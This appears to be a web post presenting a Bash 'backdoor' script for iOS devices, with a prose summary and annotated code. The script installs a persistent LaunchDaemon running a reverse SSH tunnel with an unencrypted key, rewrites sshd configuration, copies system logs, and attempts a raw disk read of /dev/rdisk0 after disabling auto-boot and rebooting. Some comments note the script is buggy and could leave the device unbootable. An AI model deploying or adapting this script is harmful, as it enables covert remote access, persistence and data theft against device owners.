- Check out the git repo for commands: https://github.com/libimobiledevice/libimobiledevice
Backdoor:
This Bash script handles the steps for getting SSH on an iOS system, so long as a unique identifier has been worked out beforehand. It starts by turning on strict error handling and defining an error-logging function. Key tasks include copying the SSH binary to a specific spot, making it executable, and creating a launch daemon (com.example.ssh.plist) that launches SSH with selected specs (key location, port, port forwarding).
It sorts out SSH key creation if needed, writes out an sshd config file that disables password authentication, edits sshd_config so that it includes the extra config files, and restarts the SSH daemon. On top of all that, it copies the system logs into a set location and tries to make a kernel dump when the nvram tool and its auto-boot setting are available, which involves a reboot and other low-level stuff.
Code:
#!/bin/bash
# Strict mode, spelled with long option names: stop on the first failing
# command, treat unset variables as errors, and fail a pipeline when any
# stage fails.
set -o errexit -o nounset -o pipefail
# Print an error message on stderr.
# Arguments: $1 - message text
# Outputs:   "Error: <message>" on stderr; nothing on stdout
log_error() {
  printf 'Error: %s\n' "$1" >&2
}
# Placeholder for the app-container identifier. The paths under user_home are
# derived from it, so nothing below is meaningful until a real value is set.
unique_identifier="unique-identifier-placeholder"
# Paths the script reads or writes. For anyone reviewing a device, these are
# the on-disk artifacts it leaves behind: a copied binary, a LaunchDaemon
# plist, a private key, an sshd drop-in config (note the literal file name),
# a copy of the system logs and a large image file.
user_home="/var/mobile/Containers/Data/Application/$unique_identifier"
ssh_binary_path="$user_home/ssh"
launch_daemon_path="/Library/LaunchDaemons/com.example.ssh.plist"
ssh_key_path="$user_home/id_rsa"
ssh_config_dir="/etc/ssh/sshd_config.d"
ssh_config_file="$ssh_config_dir/99-iphone-backdoor.conf"
logs_dir="$user_home/logs"
kernel_dump_file="$user_home/kernel_dump.bin"
# Create the working directory (no error if it already exists).
mkdir -p "$user_home"
# Copy step for /usr/bin/ssh into the working directory. The command name is
# masked as ***** on the page as published and is kept exactly as shown.
if ! ***** /usr/bin/ssh "$ssh_binary_path"; then
log_error "Failed to copy SSH binary to $ssh_binary_path"
exit 1
fi
# Mark the copied binary executable.
chmod +x "$ssh_binary_path"
# Write the launchd job definition, truncating any file already at that path.
# The heredoc delimiter is unquoted, so $ssh_binary_path and $ssh_key_path are
# expanded when the file is written. The job (Label com.example.ssh) runs the
# copied binary as user "mobile" with -i <key>, -p 2222 and
# -R 8080:localhost:22. RunAtLoad and KeepAlive are both true, which is what
# makes this a persistence mechanism: launchd starts the job when it is loaded
# and keeps restarting it. An unexpected plist in /Library/LaunchDaemons with
# these keys is the thing to look for when auditing a device.
cat << EOF > "$launch_daemon_path"
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.example.ssh</string>
<key>ProgramArguments</key>
<array>
<string>$ssh_binary_path</string>
<string>-i</string>
<string>$ssh_key_path</string>
<string>-p</string>
<string>2222</string>
<string>-R</string>
<string>8080:localhost:22</string>
</array>
<key>KeepAlive</key>
<true/>
<key>RunAtLoad</key>
<true/>
<key>UserName</key>
<string>mobile</string>
</dict>
</plist>
EOF
# Load the job into launchd; -w overrides the job's Disabled key. Any failure
# is logged and ends the script with status 1.
if ! launchctl load -w "$launch_daemon_path"; then
log_error "Failed to load launch daemon from $launch_daemon_path"
exit 1
fi
# Generate a 4096-bit RSA key pair only when no key file exists yet. -N ""
# sets an empty passphrase, so the private key is stored unencrypted in the
# app container directory.
if [ ! -f "$ssh_key_path" ]; then
ssh-keygen -t rsa -b 4096 -f "$ssh_key_path" -N "" || {
log_error "SSH key generation failed"
exit 1
}
fi
# Ensure the sshd drop-in directory exists.
mkdir -p "$ssh_config_dir"
# Write (and overwrite, if present) the drop-in file; its only setting turns
# password authentication off.
cat << EOF > "$ssh_config_file"
PasswordAuthentication no
EOF
# Append the Include directive to the main sshd_config unless that exact line
# is already there (grep -x: whole-line match, -F: fixed string, -q: quiet).
# This edits a system configuration file in place, so a file-integrity check
# on /etc/ssh/sshd_config would register the change.
if ! grep -qxF 'Include /etc/ssh/sshd_config.d/*.conf' /etc/ssh/sshd_config; then
echo "Include /etc/ssh/sshd_config.d/*.conf" >> /etc/ssh/sshd_config
fi
# Restart sshd through launchctl (stop, then start), but only when
# `launchctl list` mentions com.openssh.sshd; otherwise log and exit 1.
if launchctl list | grep -q com.openssh.sshd; then
launchctl stop com.openssh.sshd
launchctl start com.openssh.sshd
else
log_error "OpenSSH daemon is not running"
exit 1
fi
# Collect everything matched by /var/log/* into the logs directory. As with
# the earlier copy step, the command name is masked as ***** on the page.
mkdir -p "$logs_dir"
***** /var/log/* "$logs_dir/" || {
log_error "Failed to copy system logs"
exit 1
}
# "Kernel dump" step. Runs only when an nvram command exists and
# `nvram auto-boot` exits successfully; otherwise it logs an error and exits 1.
# Inside the branch it sets auto-boot=false, flushes buffers with sync, calls
# `reboot -d`, waits 60 seconds, sets auto-boot=true again, then reads
# /dev/rdisk0 in 4096-byte blocks into $kernel_dump_file.
# NOTE(review): /dev/rdisk0 is a raw disk device, so the output looks like a
# disk image rather than a kernel memory dump, despite the names used here;
# confirm intent.
# NOTE(review): the statements after `reboot -d` presumably never run if the
# reboot takes effect, which would leave auto-boot=false on the device; verify.
if command -v nvram &> /dev/null && nvram auto-boot &> /dev/null; then
nvram auto-boot=false
sync
reboot -d
sleep 60
nvram auto-boot=true
dd if=/dev/rdisk0 of="$kernel_dump_file" bs=4096 || {
log_error "Failed to create kernel dump"
exit 1
}
else
log_error "Kernel dump creation failed: nvram or auto-boot setting not available"
exit 1
fi
* Just make sure you've got the right permissions and paths sorted out to allow remote access and system monitoring capabilities.